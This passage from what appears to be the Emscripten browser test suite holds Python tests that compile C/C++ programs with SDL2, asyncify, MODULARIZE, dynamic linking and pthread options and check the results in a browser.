def test_sdl2_misc_via_object(self):
self.run_process([EMCC, '-c', test_file('sdl2_misc.c'), '-s', 'USE_SDL=2', '-o', 'test.o'])
self.compile_btest(['test.o', '-s', 'EXIT_RUNTIME', '-s', 'USE_SDL=2', '-o', 'test.html'])
self.run_browser('test.html', '...', '/report_result?exit:0')
@parameterized({
'dash_s': (['-s', 'USE_SDL=2', '-s', 'USE_SDL_MIXER=2'],),
'dash_l': (['-lSDL2', '-lSDL2_mixer'],),
})
@requires_sound_hardware
def test_sdl2_mixer_wav(self, flags):
shutil.copyfile(test_file('sounds', 'the_entertainer.wav'), 'sound.wav')
self.btest('sdl2_mixer_wav.c', expected='1', args=['--preload-file', 'sound.wav', '-s', 'INITIAL_MEMORY=33554432'] + flags)
@parameterized({
'wav': ([], '0', 'the_entertainer.wav'),
'ogg': (['ogg'], 'MIX_INIT_OGG', 'alarmvictory_1.ogg'),
'mp3': (['mp3'], 'MIX_INIT_MP3', 'pudinha.mp3'),
'mod': (['mod'], 'MIX_INIT_MOD', 'bleep.xm'),
})
@requires_sound_hardware
def test_sdl2_mixer_music(self, formats, flags, music_name):
shutil.copyfile(test_file('sounds', music_name), music_name)
self.btest('sdl2_mixer_music.c', expected='1', args=[
'--preload-file', music_name,
'-DSOUND_PATH=' + json.dumps(music_name),
'-DFLAGS=' + flags,
'-s', 'USE_SDL=2',
'-s', 'USE_SDL_MIXER=2',
'-s', 'SDL2_MIXER_FORMATS=' + json.dumps(formats),
'-s', 'INITIAL_MEMORY=33554432'
])
@no_wasm_backend('cocos2d needs to be ported')
@requires_graphics_hardware
def test_cocos2d_hello(self):
cocos2d_root = os.path.join(system_libs.Ports.get_build_dir(), 'cocos2d')
preload_file = os.path.join(cocos2d_root, 'samples', 'HelloCpp', 'Resources') + '@'
self.btest('cocos2d_hello.cpp', reference='cocos2d_hello.png', reference_slack=1,
args=['-s', 'USE_COCOS2D=3', '-s', 'ERROR_ON_UNDEFINED_SYMBOLS=0',
'--preload-file', preload_file, '--use-preload-plugins',
'-Wno-inconsistent-missing-override'],
message='You should see Cocos2d logo')
def test_async(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('browser/async.cpp', '1', args=['-O' + str(opts), '-g2', '-s', 'ASYNCIFY'])
def test_asyncify_tricky_function_sig(self):
self.btest('browser/test_asyncify_tricky_function_sig.cpp', '85', args=['-s', 'ASYNCIFY_ONLY=[foo(char.const*?.int#),foo2(),main,__original_main]', '-s', 'ASYNCIFY=1'])
@requires_threads
def test_async_in_pthread(self):
self.btest('browser/async.cpp', '1', args=['-s', 'ASYNCIFY', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-g'])
def test_async_2(self):
# Error.stackTraceLimit defaults to 10 in Chrome, but this test relies on
# more than 40 stack frames being reported.
create_file('pre.js', 'Error.stackTraceLimit = 80;\n')
self.btest('browser/async_2.cpp', '40', args=['-O3', '--pre-js', 'pre.js', '-s', 'ASYNCIFY'])
def test_async_virtual(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_virtual.cpp', '5', args=['-O' + str(opts), '-profiling', '-s', 'ASYNCIFY'])
def test_async_virtual_2(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_virtual_2.cpp', '1', args=['-O' + str(opts), '-s', 'ASSERTIONS', '-s', 'SAFE_HEAP', '-profiling', '-s', 'ASYNCIFY'])
# Test async sleeps in the presence of invoke_* calls, which can happen with
# longjmp or exceptions.
@parameterized({
'O0': ([],), # noqa
'O3': (['-O3'],), # noqa
})
def test_async_longjmp(self, args):
self.btest('browser/async_longjmp.cpp', '2', args=args + ['-s', 'ASYNCIFY'])
def test_async_mainloop(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_mainloop.cpp', '121', args=['-O' + str(opts), '-s', 'ASYNCIFY'])
@requires_sound_hardware
def test_sdl_audio_beep_sleep(self):
self.btest('sdl_audio_beep_sleep.cpp', '1', args=['-Os', '-s', 'ASSERTIONS', '-s', 'DISABLE_EXCEPTION_CATCHING=0', '-profiling', '-s', 'SAFE_HEAP', '-lSDL', '-s', 'ASYNCIFY'], timeout=90)
def test_mainloop_reschedule(self):
self.btest('mainloop_reschedule.cpp', '1', args=['-Os', '-s', 'ASYNCIFY'])
def test_mainloop_infloop(self):
self.btest('mainloop_infloop.cpp', '1', args=['-s', 'ASYNCIFY'])
def test_async_iostream(self):
self.btest('browser/async_iostream.cpp', '1', args=['-s', 'ASYNCIFY'])
# Test an async return value. The value goes through a custom JS library
# method that uses asyncify, and therefore it needs to be declared in
# ASYNCIFY_IMPORTS.
# To make the test more precise we also use ASYNCIFY_IGNORE_INDIRECT here.
@parameterized({
'normal': (['-s', 'ASYNCIFY_IMPORTS=[sync_tunnel]'],), # noqa
'response': (['-s', 'ASYNCIFY_IMPORTS=@filey.txt'],), # noqa
'nothing': (['-DBAD'],), # noqa
'empty_list': (['-DBAD', '-s', 'ASYNCIFY_IMPORTS=[]'],), # noqa
'em_js_bad': (['-DBAD', '-DUSE_EM_JS'],), # noqa
})
def test_async_returnvalue(self, args):
if '@' in str(args):
create_file('filey.txt', '["sync_tunnel"]')
self.btest('browser/async_returnvalue.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_IGNORE_INDIRECT', '--js-library', test_file('browser', 'async_returnvalue.js')] + args + ['-s', 'ASSERTIONS'])
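# The JS library side of such an import typically uses Asyncify.handleSleep;
# a hedged sketch (not the actual contents of async_returnvalue.js):
#
#   mergeInto(LibraryManager.library, {
#     sync_tunnel: function(value) {
#       return Asyncify.handleSleep(function(wakeUp) {
#         setTimeout(function() { wakeUp(value + 1); }, 0);
#       });
#     }
#   });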
def test_async_stack_overflow(self):
self.btest('browser/async_stack_overflow.cpp', 'abort:RuntimeError: unreachable', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_STACK_SIZE=4'])
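# ASYNCIFY_STACK_SIZE bounds the buffer Asyncify uses to save unwound local
# state; 4 bytes is far too small, so unwinding traps, matching the
# 'abort:RuntimeError: unreachable' expectation above.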
def test_async_bad_list(self):
self.btest('browser/async_bad_list.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_ONLY=[waka]', '--profiling'])
# Tests that when building with -s MINIMAL_RUNTIME=1, the build can use -s MODULARIZE=1 as well.
def test_minimal_runtime_modularize(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-s', 'MODULARIZE', '-s', 'MINIMAL_RUNTIME'])
self.run_browser('test.html', None, '/report_result?0')
@requires_sync_compilation
def test_modularize(self):
for opts in [
[],
['-O1'],
['-O2', '-profiling'],
['-O2'],
['-O2', '--closure=1']
]:
for args, code in [
# defaults
([], '''
let promise = Module();
if (!(promise instanceof Promise)) throw new Error('Return value should be a promise');
'''),
# use EXPORT_NAME
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
if (typeof Module !== "undefined") throw "what?!"; // do not pollute the global scope, we are modularized!
HelloWorld.noInitialRun = true; // erroneous module capture would load this and cause a timeout
let promise = HelloWorld();
if (!(promise instanceof Promise)) throw new Error('Return value should be a promise');
'''),
# pass in a Module option (which prevents main(), which we then invoke ourselves)
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
# Even without a mem init file, everything is async
(['-s', 'EXPORT_NAME="HelloWorld"', '--memory-init-file', '0'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
]:
print('test on', opts, args, code)
# this test is synchronous, so avoid async startup due to wasm features
self.compile_btest([test_file('browser_test_hello_world.c'), '-s', 'MODULARIZE', '-s', 'SINGLE_FILE'] + args + opts)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
%s
</script>
''' % code)
self.run_browser('a.html', '...', '/report_result?0')
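# Under MODULARIZE the output defines a factory function (named by
# EXPORT_NAME, default Module) instead of instantiating at load time; the
# factory returns a promise resolving to the instance, which is why the
# snippets above can chain .then(hello => hello._main()).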
def test_modularize_network_error(self):
test_c_path = test_file('browser_test_hello_world.c')
browser_reporting_js_path = test_file('browser_reporting.js')
self.compile_btest([test_c_path, '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path], reporting=Reporting.NONE)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
createModule()
.then(() => {
reportResultToServer("Module creation succeeded when it should have failed");
})
.catch(err => {
reportResultToServer(err.message.slice(0, 54));
});
</script>
''')
print('Deleting a.out.wasm to cause a download error')
os.remove('a.out.wasm')
self.run_browser('a.html', '...', '/report_result?abort(both async and sync fetching of the wasm failed)')
def test_modularize_init_error(self):
test_cpp_path = test_file('browser', 'test_modularize_init_error.cpp')
browser_reporting_js_path = test_file('browser_reporting.js')
self.compile_btest([test_cpp_path, '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path], reporting=Reporting.NONE)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
if (typeof window === 'object') {
window.addEventListener('unhandledrejection', function(event) {
reportResultToServer("Unhandled promise rejection: " + event.reason.message);
});
}
createModule()
.then(() => {
reportResultToServer("Module creation succeeded when it should have failed");
})
.catch(err => {
reportResultToServer(err);
});
</script>
''')
self.run_browser('a.html', '...', '/report_result?intentional error to test rejection')
# test illustrating the regression in the modularize feature introduced in
# commit c5af8f6, when compiling with the --preload-file option
def test_modularize_and_preload_files(self):
# a non-default amount of memory to allocate for the emscripten heap
totalMemory = 33554432
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure=1']]:
# the main function simply checks that the amount of allocated heap memory is correct
create_file('test.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
EM_ASM({
// use string-keyed access here so the test still succeeds when closure compiler is enabled
var totalMemory = Module['INITIAL_MEMORY'];
assert(totalMemory === %d, 'bad memory size');
});
REPORT_RESULT(0);
return 0;
}
''' % totalMemory)
# generate a dummy file
create_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
# no wasm, since this tests customizing total memory at runtime
self.compile_btest(['test.c', '-s', 'WASM=0', '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
// instantiate the Foo module with custom INITIAL_MEMORY value
var foo = Foo({ INITIAL_MEMORY: %d });
</script>
''' % totalMemory)
self.run_browser('a.html', '...', '/report_result?0')
def test_webidl(self):
# see original in test_core.py
self.run_process([PYTHON, path_from_root('tools', 'webidl_binder.py'),
test_file('webidl', 'test.idl'),
'glue'])
self.assertExists('glue.cpp')
self.assertExists('glue.js')
for opts in [[], ['-O1'], ['-O2']]:
print(opts)
self.btest(os.path.join('webidl', 'test.cpp'), '1', args=['--post-js', 'glue.js', '-I.', '-DBROWSER'] + opts)
@requires_sync_compilation
def test_dynamic_link(self):
create_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
create_file('main.cpp', r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <emscripten.h>
char *side(const char *data);
int main() {
char *temp = side("hello through side\n");
char *ret = (char*)malloc(strlen(temp)+1);
strcpy(ret, temp);
temp[1] = 'x';
EM_ASM({
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = x;
Module.realPrint(x);
};
});
puts(ret);
EM_ASM({ assert(Module.printed === 'hello through side', ['expected', Module.printed]); });
REPORT_RESULT(2);
return 0;
}
''')
create_file('side.cpp', r'''
#include <stdlib.h>
#include <string.h>
char *side(const char *data);
char *side(const char *data) {
char *ret = (char*)malloc(strlen(data)+1);
strcpy(ret, data);
return ret;
}
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm', '-s', 'EXPORT_ALL'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE', '-O2', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL'])
print('wasm in worker (we can read binary data synchronously there)')
create_file('pre.js', '''
var Module = { dynamicLibraries: ['side.wasm'] };
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm', '-s', 'EXPORT_ALL'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE', '-O2', '--pre-js', 'pre.js', '--proxy-to-worker', '-s', 'EXPORT_ALL'])
print('wasm (will auto-preload since no sync binary reading)')
create_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
# same wasm side module works
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE', '-O2', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL'])
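# Module.dynamicLibraries names side modules for the runtime to load before
# main() runs. On the main thread they must be fetched asynchronously, while
# a worker can read the binaries synchronously, which is the difference the
# proxy-to-worker variant above exercises.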
# verify that dynamic linking works in all kinds of in-browser environments.
# don't mix different kinds in a single test.
@parameterized({
'': ([0],),
'inworker': ([1],),
})
def test_dylink_dso_needed(self, inworker):
self.emcc_args += ['-O2']
# --proxy-to-worker only on main
if inworker:
self.emcc_args += ['--proxy-to-worker']
def do_run(src, expected_output):
# XXX there is no infrastructure (yet?) to retrieve stdout from the browser
# in tests, so do the assert about the expected output inside the browser.
#
# we have to put the hook into post.js because in main it is too late
# (in main we won't be able to catch what static constructors inside
# linked dynlibs printed), and in pre.js it is too early (out is not yet
# set up by the shell).
create_file('post.js', r'''
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = "";
Module.printed += x + '\n'; // out is passed str without last \n
Module.realPrint(x);
};
''')
create_file('test_dylink_dso_needed.c', src + r'''
#include <emscripten/em_asm.h>
int main() {
int rtn = test_main();
EM_ASM({
var expected = %r;
assert(Module.printed === expected, ['stdout expected:', expected]);
});
return rtn;
}
''' % expected_output)
self.btest_exit(self.in_dir('test_dylink_dso_needed.c'), args=self.get_emcc_args() + ['--post-js', 'post.js'])
self._test_dylink_dso_needed(do_run)
@requires_graphics_hardware
@requires_sync_compilation
def test_dynamic_link_glemu(self):
create_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
const char *side();
int main() {
const char *exts = side();
puts(side());
assert(strstr(exts, "GL_EXT_texture_env_combine"));
REPORT_RESULT(1);
return 0;
}
''')
create_file('side.cpp', r'''
#include "SDL/SDL.h"
#include "SDL/SDL_opengl.h"
const char *side() {
SDL_Init(SDL_INIT_VIDEO);
SDL_SetVideoMode(600, 600, 16, SDL_OPENGL);
return (const char *)glGetString(GL_EXTENSIONS);
}
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm', '-lSDL', '-s', 'EXPORT_ALL'])
self.btest(self.in_dir('main.cpp'), '1', args=['-s', 'MAIN_MODULE', '-O2', '-s', 'LEGACY_GL_EMULATION', '-lSDL', '-lGL', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL'])
def test_dynamic_link_many(self):
# test asynchronously loading two side modules during startup
create_file('pre.js', '''
Module.dynamicLibraries = ['side1.wasm', 'side2.wasm'];
''')
create_file('main.c', r'''
int side1();
int side2();
int main() {
return side1() + side2();
}
''')
create_file('side1.c', r'''
int side1() { return 1; }
''')
create_file('side2.c', r'''
int side2() { return 2; }
''')
self.run_process([EMCC, 'side1.c', '-s', 'SIDE_MODULE', '-o', 'side1.wasm'])
self.run_process([EMCC, 'side2.c', '-s', 'SIDE_MODULE', '-o', 'side2.wasm'])
self.btest_exit(self.in_dir('main.c'), assert_returncode=3,
args=['-s', 'MAIN_MODULE', '--pre-js', 'pre.js'])
def test_dynamic_link_pthread_many(self):
# Test asynchronously loading two side modules during startup
# They should always load in the same order
# Verify that function pointers in the browser's main thread
# refer to the same function as in a pthread worker.
# The main thread function table is populated asynchronously
# in the browser's main thread. However, it should still be
# populated in the same order as in a pthread worker to
# guarantee function pointer interop.
create_file('main.cpp', r'''
#include <thread>
int side1();
int side2();
int main() {
auto side1_ptr = &side1;
auto side2_ptr = &side2;
// Don't join the thread since this is running in the
// browser's main thread.
std::thread([=]{
REPORT_RESULT(int(
side1_ptr == &side1 &&
side2_ptr == &side2
));
}).detach();
return 0;
}
''')
# The browser will try to load side1 first.
# Use a big payload in side1 so that it takes longer to load than side2
create_file('side1.cpp', r'''
char const * payload1 = "''' + str(list(range(1, int(1e5)))) + r'''";
int side1() { return 1; }
''')
create_file('side2.cpp', r'''
char const * payload2 = "0";
int side2() { return 2; }
''')
self.run_process([EMCC, 'side1.cpp', '-Wno-experimental', '-pthread', '-s', 'SIDE_MODULE', '-o', 'side1.wasm'])
self.run_process([EMCC, 'side2.cpp', '-Wno-experimental', '-pthread', '-s', 'SIDE_MODULE', '-o', 'side2.wasm'])
self.btest(self.in_dir('main.cpp'), '1',
args=['-Wno-experimental', '-pthread', '-s', 'MAIN_MODULE', 'side1.wasm', 'side2.wasm'])
def test_memory_growth_during_startup(self):
create_file('data.dat', 'X' * (30 * 1024 * 1024))
self.btest('browser_test_hello_world.c', '0', args=['-s', 'ASSERTIONS', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'INITIAL_MEMORY=16MB', '-s', 'TOTAL_STACK=16384', '--preload-file', 'data.dat'])
# pthreads tests
def prep_no_SAB(self):
create_file('html.html', open(path_from_root('src', 'shell_minimal.html')).read().replace('''<body>''', '''<body>
<script>
SharedArrayBuffer = undefined;
Atomics = undefined;
</script>
'''))
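# Deleting SharedArrayBuffer/Atomics in the shell simulates a browser with
# no threading support, letting tests exercise the non-SAB fallback paths.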
@requires_threads
def test_pthread_c11_threads(self):
self.btest(test_file('pthread', 'test_pthread_c11_threads.c'),
expected='0',
args=['-g4', '-std=gnu11', '-xc', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'TOTAL_MEMORY=64mb'])
@requires_threads
def test_pthread_pool_size_strict(self):
# Check that it doesn't fail with sufficient number of threads in the pool.
self.btest(test_file('pthread', 'test_pthread_c11_threads.c'),
expected='0',
args=['-g2', '-xc', '-std=gnu11', '-pthread', '-s', 'PTHREAD_POOL_SIZE=4', '-s', 'PTHREAD_POOL_SIZE_STRICT=2', '-s', 'TOTAL_MEMORY=64mb'])
# Check that it fails instead of deadlocking on insufficient number of threads in the pool.
self.btest(test_file('pthread', 'test_pthread_c11_threads.c'),
expected='abort:Assertion failed: thrd_create(&t4, thread_main, NULL) == thrd_success',
args=['-g2', '-xc', '-std=gnu11', '-pthread', '-s', 'PTHREAD_POOL_SIZE=3', '-s', 'PTHREAD_POOL_SIZE_STRICT=2', '-s', 'TOTAL_MEMORY=64mb'])
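# PTHREAD_POOL_SIZE_STRICT=2 makes thread creation fail outright (rather
# than queue and potentially deadlock) once the preallocated pool is
# exhausted, which is why a pool of 3 aborts while a pool of 4 succeeds.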
@requires_threads
def test_pthread_in_pthread_pool_size_strict(self):
# Check that it fails when there's a pthread creating another pthread.
self.btest(test_file('pthread', 'test_pthread_create_pthread.cpp'), expected='1', args=['-g2', '-pthread', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'PTHREAD_POOL_SIZE_STRICT=2'])
# Check that it fails when there's a pthread creating another pthread.
self.btest(test_file('pthread', 'test_pthread_create_pthread.cpp'), expected='-200', args=['-g2', '-pthread', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'PTHREAD_POOL_SIZE_STRICT=2'])
# Test that the emscripten_atomic_* API functions work.
@parameterized({
'normal': ([],),
'closure': (['--closure=1'],),
})
@requires_threads
def test_pthread_atomics(self, args=[]):
self.btest(test_file('pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-g1'] + args)
# Test 64-bit atomics.
@requires_threads
def test_pthread_64bit_atomics(self):
self.btest(test_file('pthread', 'test_pthread_64bit_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test 64-bit C++11 atomics.
@requires_threads
def test_pthread_64bit_cxx11_atomics(self):
for opt in [['-O0'], ['-O3']]:
for pthreads in [[], ['-s', 'USE_PTHREADS']]:
self.btest(test_file('pthread', 'test_pthread_64bit_cxx11_atomics.cpp'), expected='0', args=opt + pthreads)
# Test c++ std::thread::hardware_concurrency()
@requires_threads
def test_pthread_hardware_concurrency(self):
self.btest(test_file('pthread', 'test_pthread_hardware_concurrency.cpp'), expected='0', args=['-O2', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE="navigator.hardwareConcurrency"'])
@parameterized({
'join': ('join',),
'wait': ('wait',),
})
@requires_threads
def test_pthread_main_thread_blocking(self, name):
print('Test that we error if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest(test_file('pthread', 'main_thread_%s.cpp' % name), expected='abort:Blocking on the main thread is not allowed by default.', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
if name == 'join':
print('Test that by default we just warn about blocking on the main thread.')
self.btest(test_file('pthread', 'main_thread_%s.cpp' % name), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest(test_file('pthread', 'main_thread_join.cpp'), expected='2', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-g', '-DTRY_JOIN', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD, and even without a pool')
self.btest(test_file('pthread', 'main_thread_join.cpp'), expected='2', args=['-O3', '-s', 'USE_PTHREADS', '-g', '-DTRY_JOIN', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that everything works ok when we are on a pthread.')
self.btest(test_file('pthread', 'main_thread_%s.cpp' % name), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'PROXY_TO_PTHREAD', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
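# The -DTRY_JOIN variant presumably polls instead of blocking, along these lines
# (sketch; pthread_tryjoin_np is a GNU extension, so _GNU_SOURCE is needed):
#
#   void *retval;
#   while (pthread_tryjoin_np(t, &retval) == EBUSY) {
#     /* keep the main thread responsive instead of blocking in pthread_join() */
#   }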
# Test the old GCC atomic __sync_fetch_and_op builtin operations.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomic_fetch_and_op(self):
for opt in [[], ['-O1'], ['-O2'], ['-O3'], ['-Os']]:
for debug in [[], ['-g']]:
args = opt + debug
print(args)
self.btest(test_file('pthread', 'test_pthread_gcc_atomic_fetch_and_op.cpp'), expected='0', args=args + ['-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# 64-bit version of the above test.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_64bit_atomic_fetch_and_op(self):
self.btest(test_file('pthread', 'test_pthread_gcc_64bit_atomic_fetch_and_op.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Test the old GCC atomic __sync_op_and_fetch builtin operations.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomic_op_and_fetch(self):
self.btest(test_file('pthread', 'test_pthread_gcc_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# 64-bit version of the above test.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_64bit_atomic_op_and_fetch(self):
self.btest(test_file('pthread', 'test_pthread_gcc_64bit_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Tests the rest of the remaining GCC atomics after the two above tests.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomics(self):
self.btest(test_file('pthread', 'test_pthread_gcc_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the __sync_lock_test_and_set and __sync_lock_release primitives.
@requires_threads
def test_pthread_gcc_spinlock(self):
for arg in [[], ['-DUSE_EMSCRIPTEN_INTRINSICS']]:
self.btest(test_file('pthread', 'test_pthread_gcc_spinlock.cpp'), expected='800', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + arg, also_asmjs=True)
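# These builtins implement the classic test-and-set spinlock (sketch of the
# pattern, not the actual test source):
#
#   static volatile int lock = 0;
#   void acquire(void) { while (__sync_lock_test_and_set(&lock, 1)) { /* spin */ } }
#   void release(void) { __sync_lock_release(&lock); }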
# Test that basic thread creation works.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_create(self):
def test(args):
print(args)
self.btest(test_file('pthread', 'test_pthread_create.cpp'),
expected='0',
args=['-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + args,
extra_tries=0) # this should be 100% deterministic
print() # new line
test([])
test(['-O3'])
# TODO: re-enable minimal runtime once the flakiness is figured out,
# https://github.com/emscripten-core/emscripten/issues/12368
# test(['-s', 'MINIMAL_RUNTIME'])
# Test that preallocating worker threads works.
@requires_threads
def test_pthread_preallocates_workers(self):
self.btest(test_file('pthread', 'test_pthread_preallocates_workers.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=4', '-s', 'PTHREAD_POOL_DELAY_LOAD'])
# Test that allocating a lot of threads doesn't regress. This needs to be checked manually!
@requires_threads
def test_pthread_large_pthread_allocation(self):
self.btest(test_file('pthread', 'test_large_pthread_allocation.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=128MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=50'], message='Check output from test to ensure that a regression in time it takes to allocate the threads has not occurred.')
# Tests the -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_pthread_proxy_to_pthread(self):
self.btest(test_file('pthread', 'test_pthread_proxy_to_pthread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Test that a pthread can spawn another pthread of its own.
@requires_threads
def test_pthread_create_pthread(self):
for modularize in [[], ['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')]]:
self.btest(test_file('pthread', 'test_pthread_create_pthread.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'] + modularize)
# Test another case of pthreads spawning pthreads, but this time the callers immediately join on the threads they created.
@requires_threads
def test_pthread_nested_spawns(self):
self.btest(test_file('pthread', 'test_pthread_nested_spawns.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that main thread can wait for a pthread to finish via pthread_join().
@requires_threads
def test_pthread_join(self):
self.btest(test_file('pthread', 'test_pthread_join.cpp'), expected='6765', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that threads can rejoin the pool once detached and finished
@requires_threads
def test_std_thread_detach(self):
self.btest(test_file('pthread', 'test_std_thread_detach.cpp'), expected='0', args=['-s', 'USE_PTHREADS'])
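# The pattern under test (sketch, not the actual test source): once a detached
# std::thread finishes, its underlying worker should return to the pool for reuse.
#
#   std::thread([]{ /* work */ }).detach();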
# Test pthread_cancel() operation
@requires_threads
def test_pthread_cancel(self):
self.btest(test_file('pthread', 'test_pthread_cancel.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthread_cancel() cancels pthread_cond_wait() operation
@requires_threads
def test_pthread_cancel_cond_wait(self):
self.btest_exit(test_file('pthread', 'test_pthread_cancel_cond_wait.cpp'), assert_returncode=1, args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test pthread_kill() operation
@no_chrome('pthread_kill hangs chrome renderer, and keep subsequent tests from passing')
@requires_threads
def test_pthread_kill(self):
self.btest(test_file('pthread', 'test_pthread_kill.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthread cleanup stack (pthread_cleanup_push/_pop) works.
@requires_threads
def test_pthread_cleanup(self):
self.btest(test_file('pthread', 'test_pthread_cleanup.cpp'), expected='907640832', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
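# The cleanup-stack API exercised above has this shape (sketch, not the actual
# test source):
#
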